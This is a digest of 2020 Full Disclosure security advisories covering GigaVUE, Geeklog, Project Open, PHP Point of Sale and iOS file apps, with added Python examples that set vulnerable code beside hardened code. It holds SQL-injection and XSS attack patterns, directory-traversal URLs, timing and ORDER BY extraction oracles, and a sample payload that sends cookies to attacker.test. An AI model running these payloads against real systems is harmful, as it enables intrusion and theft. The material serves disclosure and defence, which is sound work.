[FD] Exploiting java deserialization vulnerabilities in crypto contexts - a java applet case-study

2020-04-28 Thread RedTimmy Security
Hi,

regardless of being a deprecated technology, there are still many legacy 
applications relying on java applets out there. A bit of time ago we were 
involved in an atypical web application penetration test.

The difficulty consisted in the fact that the java serialized payload 
responsible for triggering the vulnerability was located inside the 
authenticated part of a digital certificate, signed client-side with a private 
key stored in an HSM module.

In case you are interested, the full story is here: 
https://www.redtimmy.com/web-application-hacking/how-we-invented-enumjavalibs-while-finding-a-java-deserialization-bug-and-achieving-rce/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Gigamon - GigaVUE 0day

2020-04-28 Thread Balázs Hambalkó
Hi,

An issue was discovered in Gigamon GigaVUE 5.5.01.11.
The upload functionality allows an authenticated user to change the
filename value (in the POST method) from the original filename
to achieve directory traversal via a ../ sequence and, for example,
obtain a complete directory listing of the machine.

--

[Additional Information]
This vulnerability aids the attacker in discovering the whole file
system of the underlying host system - including identifying the
writeable and read-only file systems.

The authenticated user needs to use the upload functionality. The POST
HTTP verb is being used which needs to be intercepted, and modified
(the "filename" parameter must be manipulated in the POST body
section)

These vulnerabilities were reported to the vendor. They said this
version will be decommissioned in 2023 and they decided not to provide
technical support anymore. In other words, they will not fix any IT
Security Issues which have lower than critical risk. This
version is in production in enterprise environments, and will be
available until end of 2023, so the impact is real.

--

[Vulnerability Type]
Directory Traversal

--

[Vendor of Product]
Gigamon

--

[Affected Product Code Base]
GigaVUE - 5.5.01.11

--

[Affected Component]
Upload functionality

--

[Attack Type]
Remote

--

[Impact Information Disclosure]
true

--

[Attack Vectors]
The authenticated user needs to use the upload functionality. The POST
HTTP verb is being used which needs to be intercepted, and modified
(the "filename" parameter must be manipulated in the POST body
section)

--

[Reference]
https://www.gigamon.com/products/access-traffic/physical-nodes.html

--

[Has vendor confirmed or acknowledged the vulnerability?]
true

--

[Discoverer]
Balazs Hambalko, IT Security Consultant

Use CVE-2020-12251.



An issue was discovered in Gigamon GigaVUE 5.5.01.11. The upload
functionality allows an arbitrary file upload for an authenticated
user. If an executable file is uploaded into the www-root directory,
then it could yield remote code execution via the filename parameter.

--

[Additional Information]
These vulnerabilities were reported to the vendor. They said this
version will be decommissioned in 2023 and they decided not to provide
technical support anymore. In other words, they will not fix any IT
Security Issues which have lower than critical risk. This
version is in production in enterprise environments, and will be
available until end of 2023, so the impact is real.

--

[Vulnerability Type]
Insecure Permissions

--

[Vendor of Product]
Gigamon

--

[Affected Product Code Base]
GigaVUE - 5.5.01.11

--

[Affected Component]
Upload functionality

--

[Attack Type]
Remote

--

[Impact Code execution]
true

--

[Attack Vectors]
The authenticated user needs to use the upload functionality. The POST
HTTP verb is being used which needs to be intercepted, and modified
(the "filename" parameter must be manipulated in the POST body
section)

--

[Reference]
https://www.gigamon.com/products/access-traffic/physical-nodes.html

--

[Has vendor confirmed or acknowledged the vulnerability?]
true

--

[Discoverer]
Balazs Hambalko, IT Security Consultant


Use CVE-2020-12252.



[FD] Blind SQL Injection Vulnerability in Geeklog 2.2.1

2020-04-28 Thread Daniel Bishtawi
Hello,

We are informing you about a Blind SQL Injection Vulnerability in Geeklog
2.2.1.

Information


Advisory by Netsparker
Name: Blind SQL Injection Vulnerability in Geeklog
Affected Software: Geeklog
Affected Versions: 2.2.1
Vendor Homepage: https://www.geeklog.net/
Vulnerability Type: Blind SQL Injection
Severity: Critical
Status: Fixed
CVSS Score (3.0): 8.6 (High)
Netsparker Advisory Reference: NS-20-002

Technical Details


Blind SQL Injection

URL  :
http://sectestapp/geeklog-2.2.1/public_html/comment.php#commenteditform
Parameter Name  : uid
Parameter Type  : POST
Attack Pattern  :
2+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f

For more information:
https://www.netsparker.com/web-applications-advisories/ns-20-002-blind-sql-injection-in-geeklog/


Regards,

Daniel Bishtawi | Marketing Administrator
E: dan...@netsparker.com 
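The finding above is a time-based blind injection in a numeric POST parameter. The following is an added example, not Geeklog code and not the Netsparker scanner: a toy comment handler that splices the `uid` parameter into its query (the bug class reported above), a hardened handler that converts and binds it, and a timing oracle of the kind used to confirm a blind finding. It runs offline against sqlite3, which has no SLEEP(), so one is registered as a user-defined function to stand in for MySQL's; the table, columns and rows are constructed for the example.

```python
"""Time-based blind SQL injection in a numeric POST parameter, reproduced
offline with sqlite3.  Added example; all names are assumptions."""
from __future__ import annotations

import sqlite3
import time

SLEEP_SECONDS = 0.3      # kept short for the demo; scanners use several seconds
# Numeric-context payload: evaluates to 2 + 0 after the delay, so the query
# still returns a row and the only observable effect is the time it took.
TIME_PAYLOAD = f"2 + (SELECT SLEEP({SLEEP_SECONDS}))"


def make_db() -> sqlite3.Connection:
    """In-memory database with a MySQL-style SLEEP() and constructed rows."""
    conn = sqlite3.connect(":memory:")
    # MySQL's SLEEP(n) pauses n seconds and returns 0; emulate that.
    conn.create_function("SLEEP", 1, lambda secs: time.sleep(float(secs)) or 0)
    conn.execute("CREATE TABLE users (uid INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "admin"), (2, "alice"), (3, "bob")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, uid: str) -> list[str]:
    """Vulnerable: request data becomes part of the SQL text."""
    sql = f"SELECT username FROM users WHERE uid = {uid}"
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn: sqlite3.Connection, uid: str) -> list[str]:
    """Hardened: validate the type, then bind.  A payload fails int() before
    any SQL is built; a valid id is sent as a parameter, never as SQL text."""
    uid_int = int(uid)
    return [row[0] for row in conn.execute(
        "SELECT username FROM users WHERE uid = ?", (uid_int,))]


def _elapsed(handler, conn: sqlite3.Connection, value: str) -> float:
    start = time.perf_counter()
    try:
        handler(conn, value)
    except (sqlite3.Error, ValueError):
        pass          # an error response carries no timing signal
    return time.perf_counter() - start


def timing_oracle(handler, conn: sqlite3.Connection, baseline: str = "2",
                  payload: str = TIME_PAYLOAD) -> bool:
    """True if the payload request is slower than the baseline by roughly the
    injected delay, i.e. the database evaluated our SLEEP()."""
    base = _elapsed(handler, conn, baseline)
    probe = _elapsed(handler, conn, payload)
    return probe - base >= SLEEP_SECONDS * 0.8


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", timing_oracle(lookup_vulnerable, db))
    print("hardened handler injectable:  ", timing_oracle(lookup_hardened, db))
```

The advisory's attack pattern is a polyglot version of the same idea: the `/*'XOR(...)OR'|"XOR(...)OR"*/` tail makes one string work whether the parameter lands in a numeric, single-quoted or double-quoted context. A real oracle repeats each measurement several times to separate the injected delay from network jitter.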



[FD] Cross-Site Scripting Vulnerability in Geeklog 2.2.1

2020-04-28 Thread Daniel Bishtawi
Hello,

We are informing you about a Cross-Site Scripting Vulnerability in Geeklog
2.2.1.

Here are the details:

Information


Advisory by Netsparker
Name: Cross-Site Scripting Vulnerability in Geeklog
Affected Software: Geeklog
Affected Versions: 2.2.1
Vendor Homepage: https://www.geeklog.net/
Vulnerability Type: Cross-Site Scripting
Severity: Important
Status: Fixed
CVSS Score (3.0): 7.4 (High)
Netsparker Advisory Reference: NS-20-001

Technical Details


URL :
http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=x
"%20onmouseover=netsparker(0x01AAEC)%20x="=1=pi_load
Parameter Name : direction
Parameter Type : GET
Attack Pattern : x%22+onmouseover%3dnetsparker(0x01AAEC)+x%3d%22

URL :
http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=ASC=1=x
"%20onmouseover=netsparker(0x019E05)%20x="
Parameter Name : prevorder
Parameter Type : GET
Attack Pattern : x%22+onmouseover%3dnetsparker(0x019E05)+x%3d%22

For more information:
https://www.netsparker.com/web-applications-advisories/ns-20-001-cross-site-scripting-in-geeklog/


Regards,

Daniel Bishtawi | Marketing Administrator
E: dan...@netsparker.com 



[FD] Multiple vulnerabilities OpenAudiT

2020-04-28 Thread Pablo Zurro via Fulldisclosure
https://www.coresecurity.com/advisories/open-audit-multiple-vulnerabilities

Pablo A. Zurro
Technical Product Manager
e. pablo.zu...@helpsystems.com
p. +34 93 274 0051 Ext. 211
w. www.helpsystems.com/es





[FD] Project Open v5.0.3 CMS - Multiple Web Vulnerabilities

2020-04-28 Thread Vulnerability Lab
Document Title:
===
Project Open v5.0.3 CMS - Multiple Web Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2225


Release Date:
=
2020-04-25


Vulnerability Laboratory ID (VL-ID):

2225


Common Vulnerability Scoring System:

7.3


Vulnerability Class:

Multiple


Current Estimated Price:

2.000€ - 3.000€


Product & Service Introduction:
===
Join more than 20.000 users and become part of our Community. You will
be able to track your incidents,
create new tickets, add product ideas and track the progress of development.

(Copy of the Homepage:  http://project-open.net/ )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the official Project Open v5.0.3 CMS.


Affected Product(s):

Project-Open
Product: Project Open v5.0.3 - CMS (Web-Application)


Vulnerability Disclosure Timeline:
==
2020-04-27: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
High


Authentication Type:

Restricted authentication (user/moderator) - User privileges


User Interaction:
=
No User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

1.1
Multiple remote sql-injection web vulnerabilities have been discovered in
the official Project Open v5.0.3 CMS web-application.
The vulnerability allows remote attackers to inject or execute own sql
commands to compromise the dbms or file system of the application.

The sql injection vulnerabilities are located in the `order_by`,
`forum_order_by` and `audit_id` parameters of the
`./intranet-expenses/index`
and `./intranet-audit/view` modules. The request method to inject or
execute commands is GET and the attack vector is located on the
application-side.
Attackers with privileged accounts to edit are able to inject their own sql
queries via the order or id parameter to compromise the dbms. Multiple
unhandled and broken sql queries are visible as default debug output for
different roles as well.

Exploitation of the remote sql injection vulnerability requires no user
interaction and a privileged web-application user account.
Successful exploitation of the remote sql injection results in database
management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./intranet-expenses/index
[+] ./intranet-audit/view

Vulnerable Parameter(s):
[+] forum_order_by
[+] order_by
[+] audit_id



1.2
Multiple non-persistent cross site scripting vulnerabilities have been
discovered in the official Project Open v5.0.3 CMS web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with non-persistent attack vector to compromise browser
to web-application requests from the client-side.

The cross site scripting web security vulnerabilities are located in the
`bread_crum_path` and `re_path` parameters of the
`./intranet/projects/view` and `./intranet-filestorage` modules. The
request method to inject the malicious script code is
GET and the attack vector of the vulnerability is non-persistent on
client-side.

Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack vector of
the vulnerability is non-persistent and the request method to
inject/execute is GET. The vulnerabilities are classic client-side cross
site
scripting vulnerabilities. Successful exploitation of the vulnerability
results in session hijacking, non-persistent phishing attacks,
non-persistent external redirects to malicious source and non-persistent
manipulation of affected or connected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./intranet/projects/view
[+] ./intranet-filestorage

Vulnerable Parameter(s):
[+] bread_crum_path
[+] rel_path


Proof of Concept (PoC):
===
1.1
The remote sql-injection web vulnerabilities can be exploited by
authenticated privileged user accounts without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


PoC: SQL-Injection
https://po-cms.localhost:80/intranet/?forum_max_entries_per_page=10_order_by='[SQL
INJECTION]--_object_id=0_start_idx=10&
https://po-cms.localhost:80/intranet-expenses/index?end_date=2020-04-25=todo_type_id=_id=29129_date=2000-01-01='[SQL
INJECTION]--
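The `order_by` / `forum_order_by` parameters above are an ORDER BY injection, a shape that differs from the numeric `uid` case: a column name or sort direction cannot be passed as a bound parameter, which is exactly why such values end up concatenated. The following is an added example, not Project Open code: an expense listing whose `order_by` parameter is spliced into ORDER BY, beside a version that maps the parameter through an allowlist, plus a boolean oracle that shows why an ORDER BY injection is not "just sorting". It runs offline against sqlite3; the table layout and rows are constructed for the example.

```python
"""SQL injection through ORDER BY parameters, reproduced offline with sqlite3.
Added example; table, columns and rows are constructed."""
from __future__ import annotations

import sqlite3

# Request value -> SQL identifier.  Only these strings can reach the query text.
ALLOWED_ORDER_BY = {"amount": "amount", "expense_date": "expense_date", "name": "name"}
ALLOWED_DIRECTION = {"asc": "ASC", "desc": "DESC"}


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE expenses (id INTEGER PRIMARY KEY, name TEXT, "
                 "amount REAL, expense_date TEXT)")
    conn.executemany("INSERT INTO expenses VALUES (?, ?, ?, ?)", [
        (1, "taxi", 30.0, "2020-04-01"),
        (2, "hotel", 200.0, "2020-04-02"),
        (3, "lunch", 12.5, "2020-04-03"),
    ])
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, "
                 "password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin@example.test', 'c0nstructed-hash')")
    return conn


def list_expenses_vulnerable(conn: sqlite3.Connection, order_by: str) -> list[str]:
    """Vulnerable: whatever arrives in order_by is appended to the query."""
    return [r[0] for r in conn.execute(
        f"SELECT name FROM expenses ORDER BY {order_by}")]


def list_expenses_hardened(conn: sqlite3.Connection, order_by: str,
                           direction: str = "asc") -> list[str]:
    """Hardened: the request value selects an identifier from a fixed map and
    is never itself placed in the SQL."""
    column = ALLOWED_ORDER_BY.get(order_by)
    dir_sql = ALLOWED_DIRECTION.get(direction.lower())
    if column is None or dir_sql is None:
        raise ValueError(f"unsupported sort {order_by!r} {direction!r}")
    return [r[0] for r in conn.execute(
        f"SELECT name FROM expenses ORDER BY {column} {dir_sql}")]


def hardened_rejects(conn: sqlite3.Connection, order_by: str) -> bool:
    try:
        list_expenses_hardened(conn, order_by)
    except ValueError:
        return True
    return False


def order_by_oracle(conn: sqlite3.Connection, guess: str) -> bool:
    """Boolean-based extraction through ORDER BY: sort by amount when the
    guessed first character of the admin's password hash is right, by name
    otherwise, and read the answer from the order of the rows."""
    payload = ("(CASE WHEN (SELECT substr(password_hash, 1, 1) FROM users WHERE id = 1)"
               f" = '{guess}' THEN amount ELSE name END)")
    return (list_expenses_vulnerable(conn, payload)
            == list_expenses_vulnerable(conn, "amount"))


def extract_first_char(conn: sqlite3.Connection,
                       alphabet: str = "0123456789abcdef") -> str | None:
    """One character per pass; a real attack loops this over every position."""
    for ch in alphabet:
        if order_by_oracle(conn, ch):
            return ch
    return None
```

The allowlist is the whole fix: there is no escaping function for identifiers that is safe across databases, so the request value must never be the identifier, only a key that selects one.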

[FD] POS PHP v17.5 - Persistent Cross Site Web Vulnerability

2020-04-28 Thread Vulnerability Lab
Document Title:
===
POS PHP v17.5 - Persistent Cross Site Web Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2228


Release Date:
=
2020-04-28


Vulnerability Laboratory ID (VL-ID):

2228


Common Vulnerability Scoring System:

4.6


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
Turn your Retail Small Business into a Customer Focused, Profit
Generating Machine. Guaranteed to save you time,
increase the accuracy of your inventory, and help you make informed
decisions for your business. Types of businesses
that work great with PHP Point of Sale.

(Copy of the Homepage: https://phppointofsale.com/ )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent
cross site scripting web vulnerability in the POS PHP v17.5 web-application.


Vulnerability Disclosure Timeline:
==
2020-04-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted authentication (user/moderator) - User privileges


User Interaction:
=
Low User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

A persistent input validation web vulnerability has been discovered in
the official POS PHP v17.5 web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to
compromise browser to web-application requests from the application-side.

The persistent web vulnerability is located in the firstname and
lastname parameters of the customer profile module.
Remote attackers are able to change or add malicious script code as
firstname and lastname to customer profiles.
This allows the script code to execute with persistent attack vector
against administrators in the backend in the
/customers/ or customers/save/ modules. The request method to inject is
POST via add or edit of the customer and
the attack vector is located on the application-side.

Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of
affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Customer (index.php/customers/save)

Vulnerable Input(s):
[+] Firstname
[+] Lastname

Vulnerable File(s):
[+]

Vulnerable Parameter(s):
[+] firstname
[+] lastname

Affected Module(s):
[+] index.php/customers/


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by
remote attackers with a low-privilege user account and low user interaction.
For security demonstration or to reproduce the security web
vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce ...
1. Register a customer account
2. Move to the profile section
3. Inject test payload into the vulnerable firstname and lastname input
field
4. Save the entry and wait
Note: The execution occurs in the backend on preview of barcode, customer
details and more
5. Wait until the admin or other high privileged user roles interact,
which triggers execution
6. Successful reproduction of the persistent web vulnerability!


PoC: Exploitation




PoC: Vulnerable Source
Reports - PHP Point Of Sale, Inc " >"
Report04/25/2019-04/25/2020
 Print 
 Add to
Favorites


--- PoC Session Logs [POST] ---
https://pos-php.localhost:8000/index.php/customers/check_duplicate
Host: pos-php.localhost:8000
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 156
Origin: https://pos-php.localhost:8000
Connection: keep-alive
Referer: https://pos-php.localhost:8000/index.php/customers/view/-1/
Cookie: phppos=c8cophf1djsrvoidg1hm8kmfo770ts3u
name=>" >"=t...@test.de_number=1337
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
content-length: 19
server: Apache
cache-control: no-store, no-cache, must-revalidate
set-cookie: phppos=c8cophf1djsrvoidg1hm8kmfo770ts3u; path=/; HttpOnly
-
https://pos-php.localhost:8000/index.php/customers/save/
Host: pos-php.localhost:8000
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---229089197438477571343458328424
Content-Length: 5237
Origin: https://pos-php.localhost:8000
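The Geeklog, Project Open and PHP Point of Sale reports above are the two classic XSS shapes: a query parameter reflected inside an HTML attribute (`x" onmouseover=... x="` breaks out of the quoted value) and a stored field rendered as text in an admin page. The following is an added example, not code from any of those three projects: a sort link that reflects a `direction` parameter and a customer row that prints a stored first/last name, each in a vulnerable and a hardened form, plus a parser-based check of what a browser would treat as active content. The markup is invented for the example; the reflected payload is the one from the Geeklog advisory and the stored payload is constructed.

```python
"""Context-aware output encoding for attribute-context and text-context XSS.
Added example; markup and the stored payload are constructed."""
from __future__ import annotations

import html
from html.parser import HTMLParser
from urllib.parse import urlencode

ATTR_PAYLOAD = 'x" onmouseover=netsparker(0x01AAEC) x="'        # from the Geeklog advisory
STORED_PAYLOAD = ('<script>new Image().src="https://attacker.test/?c="'
                  '+document.cookie</script>')                   # constructed


def attr(value: str) -> str:
    """Attribute value: always quoted, with &, <, >, ", ' escaped.  Both halves
    matter: escaping alone does not help in an unquoted attribute, where a
    space already ends the value."""
    return '"' + html.escape(str(value), quote=True) + '"'


def text(value: str) -> str:
    """Text node between tags."""
    return html.escape(str(value), quote=True)


def sort_link_vulnerable(direction: str) -> str:
    # Bug class: raw parameter reflected into a quoted attribute.  The payload's
    # leading quote closes the value and the rest becomes new attributes.
    return f'<th><a href="plugins.php?direction={direction}">Name</a></th>'


def sort_link_hardened(direction: str) -> str:
    # URL-encode for the query string, then attribute-encode for the HTML:
    # two contexts, two encoders, applied inside-out.
    href = "plugins.php?" + urlencode({"direction": direction})
    return f"<th><a href={attr(href)}>Name</a></th>"


def customer_row_vulnerable(firstname: str, lastname: str) -> str:
    return f"<tr><td>{firstname}</td><td>{lastname}</td></tr>"


def customer_row_hardened(firstname: str, lastname: str) -> str:
    return f"<tr><td>{text(firstname)}</td><td>{text(lastname)}</td></tr>"


class _ActiveContent(HTMLParser):
    """Records event-handler attributes and <script> tags the parser sees."""

    def __init__(self) -> None:
        super().__init__()
        self.handlers: list[str] = []
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def active_content(markup: str) -> dict:
    """What a browser would execute: on* handlers and script elements."""
    parser = _ActiveContent()
    parser.feed(markup)
    parser.close()
    return {"handlers": parser.handlers, "script_tags": parser.script_tags}
```

Encoding is context-specific: `text()` and `attr()` cover text nodes and quoted attributes, but a value that ends up in a `javascript:` URL, a `<script>` block or a CSS property needs its own encoder, and a stored value must be encoded at every place it is displayed, which is where the barcode and customer-detail previews in the PHP Point of Sale report come in.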

[FD] Easy Transfer v1.7 iOS - Multiple Web Vulnerabilities

2020-04-28 Thread Vulnerability Lab
Document Title:
===
Easy Transfer v1.7 iOS - Multiple Web Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2223


Release Date:
=
2020-04-27


Vulnerability Laboratory ID (VL-ID):

2223


Common Vulnerability Scoring System:

7.1


Vulnerability Class:

Multiple


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
Transfer files between your iPhone and Computer using your local WiFi
network.

(Copy of the Homepage:
https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078 )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the Easy Transfer Wifi Transfer v1.7 ios mobile
application.


Affected Product(s):

Rubikon Teknoloji
Product: Easy Transfer v1.7 - iOS Mobile Web-Application


Vulnerability Disclosure Timeline:
==
2020-04-27: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
High


Authentication Type:

No authentication (guest)


User Interaction:
=
Low User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

1.1
A directory traversal web vulnerability has been discovered in the Easy
Transfer Wifi Transfer v1.7 ios mobile application.
The vulnerability allows remote attackers to change the application path
in performed requests to compromise the local application
or file-system of a mobile device. Attackers are for example able to
request environment variables or a sensitive system path.

The directory-traversal web vulnerability is located in the main
application path request performed via GET method. Attackers are
able to request for example the local path variables of the web-server
by changing the local path in the performed request itself.
In a first request the attacker changes the path; the host redirects to
complete the address with "..". Then the attacker just
attaches "/.." and a final slash to the request, and the path can be accessed
via web-browser to download or list local files.

Exploitation of the directory traversal web vulnerability requires no
privileged web-application user account or user interaction.
Successful exploitation of the vulnerability results in information
leaking by unauthorized file access and mobile application compromise.


1.2
Multiple persistent cross site scripting vulnerabilities have been
discovered in the Easy Transfer Wifi Transfer v1.7 ios mobile application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise the mobile
web-application from the application-side.

The persistent vulnerabilities are located in the `Create Folder` and
`Move/Edit` functions. Attackers are able to inject own malicious
script codes to the `oldPath`, `newPath` and `path` parameters. The
request method to inject is POST and the attack vector is located on
the application-side.

Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected application
modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Create Folder
[+] Move/Edit

Vulnerable Parameter(s):
[+] oldPath
[+] newPath
[+] path


Proof of Concept (PoC):
===
1.1
The directory traversal web vulnerability can be exploited by remote
attackers with wifi network access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


PoC: Exploitation
http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../

[{"path":"/../../../../../../../../../../../../../../../../../../../../../../../../../../../test/","name":"test"}]


--- PoC Session Logs [GET] --- (list)
http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
-
GET: HTTP/1.1 200 OK
Content-Length: 213
Content-Type: application/json
Connection: Close


1.2
The persistent input validation web vulnerabilities can be exploited by
remote attackers with wifi network access with low user 
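Both the GigaVUE report earlier in this digest (CVE-2020-12251: a `../` sequence in the multipart `filename` field; CVE-2020-12252: an executable landing under the web root) and the Easy Transfer listing above (`list?path=/../../..`) are the same defect: a client-supplied path component is joined to a server directory without checking where the result ends up. The following is an added example, not code from GigaVUE or Easy Transfer: `save_upload_*` models the upload case and `list_dir_*` the listing case, each in a vulnerable and a hardened form, run inside a throw-away directory tree. The tree layout and the allowed extensions are assumptions for the example.

```python
"""Path containment for client-supplied file names and directory paths.
Added example; directory layout and extension allowlist are constructed."""
from __future__ import annotations

import os
import tempfile
from pathlib import Path

ALLOWED_SUFFIXES = {".txt", ".csv", ".pdf"}      # no scripts, no executables


def make_sandbox() -> Path:
    """Constructed tree: uploads/ and www/ as siblings (the upload case),
    share/docs/ as the only directory a client may list (the listing case),
    and a secret.txt one level above the share."""
    base = Path(tempfile.mkdtemp(prefix="traversal-demo-"))
    (base / "uploads").mkdir()
    (base / "www").mkdir()
    (base / "share" / "docs").mkdir(parents=True)
    (base / "share" / "docs" / "readme.txt").write_text("constructed sample\n")
    (base / "secret.txt").write_text("outside the share\n")
    return base


def _contained(root: Path, candidate: Path) -> bool:
    """True if candidate resolves (.. and symlinks included) to root or below."""
    root_r, cand_r = root.resolve(), candidate.resolve()
    return cand_r == root_r or root_r in cand_r.parents


# --- upload: the GigaVUE shape ---------------------------------------------

def save_upload_vulnerable(upload_dir: Path, filename: str, data: bytes) -> Path:
    # Bug class: the Content-Disposition filename is joined as-is, so
    # "../www/shell.php" is written into the web root.
    target = upload_dir / filename
    target.write_bytes(data)
    return target


def save_upload_hardened(upload_dir: Path, filename: str, data: bytes) -> Path:
    # 1. keep only the last path component (handles / and \ separators)
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if name in ("", ".", "..") or name.startswith("."):
        raise ValueError("bad file name")
    # 2. allowlist the extension: nothing the web server would execute
    if Path(name).suffix.lower() not in ALLOWED_SUFFIXES:
        raise ValueError("file type not allowed")
    # 3. belt and braces: the final path must still sit under upload_dir
    target = upload_dir / name
    if not _contained(upload_dir, target):
        raise ValueError("path escapes upload directory")
    target.write_bytes(data)
    return target


def upload_outcome(upload_dir: Path, filename: str, data: bytes) -> str:
    try:
        return "saved:" + save_upload_hardened(upload_dir, filename, data).name
    except ValueError as exc:
        return "rejected:" + str(exc)


# --- listing: the Easy Transfer shape --------------------------------------

def list_dir_vulnerable(root: Path, path: str) -> list[str]:
    # Bug class: "/../" is honoured, so the listing walks above the share.
    return sorted(os.listdir(root / path.lstrip("/")))


def list_dir_hardened(root: Path, path: str) -> list[str]:
    candidate = root / path.lstrip("/")
    if not _contained(root, candidate):
        raise PermissionError(f"path escapes share root: {path!r}")
    return sorted(os.listdir(candidate))


def list_outcome(root: Path, path: str) -> str:
    try:
        return "ok:" + ",".join(list_dir_hardened(root, path))
    except PermissionError:
        return "rejected"
```

Two caveats a reviewer would raise: the upload directory itself should not be served by the web server (the extension allowlist is the second line of defence, not the first), and a suffix check is only as good as the server's handler mapping, so `shell.php.txt` on a host that matches `.php` anywhere in the name still needs the directory to be non-executable.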

[FD] File Explorer v1.4 iOS - Information Disclosure Vulnerability

2020-04-28 Thread Vulnerability Lab
Document Title:
===
File Explorer v1.4 iOS - Information Disclosure Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2220


Release Date:
=
2020-04-28


Vulnerability Laboratory ID (VL-ID):

2220


Common Vulnerability Scoring System:

7


Vulnerability Class:

Privacy Violation - Information Disclosure


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
File Explorer is the privacy app to organize and view all your files on
your iPhone or iPad. Always have your important files
with you, protect your privacy perfectly file.

(Copy of the Homepage:
https://apps.apple.com/lu/app/file-explorer-vedio-manager-photo-manager-file-browser/id954838257
)


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered an
information disclosure vulnerability in the File Explorer v1.4 mobile
ios web-application.


Affected Product(s):

Nong Ge
Product: File Explorer v1.4 - iOS Mobile Web-Application


Vulnerability Disclosure Timeline:
==
2020-04-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Local


Severity Level:
===
High


Authentication Type:

Pre auth - no privileges


User Interaction:
=
No User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

An information disclosure web vulnerability has been discovered in the
official File Explorer v1.4 mobile ios web-application.

The local file explorer application can be protected with a local pin.
Any time the user opens the app, the pin is required
for the auth to access to private file explorer data. The protection
form is attached to process after the main form with
for example the list in the local application context. Normally the pin
must popup ahead to the local file index but in this
case is processed afterwards. This allows a local attacker with physical
ios device access to bypass the security mechanism
to preview files (names, size & co) and access the protected data.

Successful exploitation of the local information disclosure application
vulnerability results in unauthorized data access.


Proof of Concept (PoC):
===
The information disclosure vulnerability can be exploited by local
attackers with physical device access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Install the local application
